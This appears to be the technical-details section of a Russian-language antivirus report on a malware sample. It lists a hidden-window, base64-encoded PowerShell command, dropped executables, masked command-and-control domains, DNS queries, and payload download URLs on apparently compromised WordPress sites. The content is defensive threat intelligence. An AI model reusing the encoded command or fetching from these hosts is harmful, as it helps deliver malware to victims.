Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAHcAbwBDAFEAMQBRAFgAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAEEAQQAnACwAJwBvAG8AUQAnACkALAAnAEEAYwAnACkAOwAkAEUAawBrAHcAQQBRAEEAIAA9ACAAJwA4ADUAMAAnADsAJ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1544
- %TEMP%\814621.cvr
- %HOMEPATH%\850.exe
- %HOMEPATH%\850.exe
- 'op####m-techno.com':80
- 'ah##ep.com':80
- 'ah##ep.com':443
- 'co######use-milcortinas.com':80
- 'me#######nsafetyconference.com':80
- 'me#######nsafetyconference.com':443
- http://op####m-techno.com/wp-includes/Axe5/
- http://www.ah##ep.com/wp-admin/bnhF/
- http://www.co######use-milcortinas.com/wp-includes/YXw/
- http://me#######nsafetyconference.com/wp-content/ZqucN/
- 'ah##ep.com':443
- 'me#######nsafetyconference.com':443
- DNS ASK op####m-techno.com
- DNS ASK ah##ep.com
- DNS ASK qu####nnehair.com
- DNS ASK co######use-milcortinas.com
- DNS ASK me#######nsafetyconference.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAHcAbwBDAFEAMQBRAFgAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAEEAQQAnACwAJwBvAG8AUQAnACkALAAnAEEAYwAnACkAOwAkAEUAawBrAHcAQQBRAEEAIAA9ACAAJwA4ADUAMAAnADsAJ...' (со скрытым окном)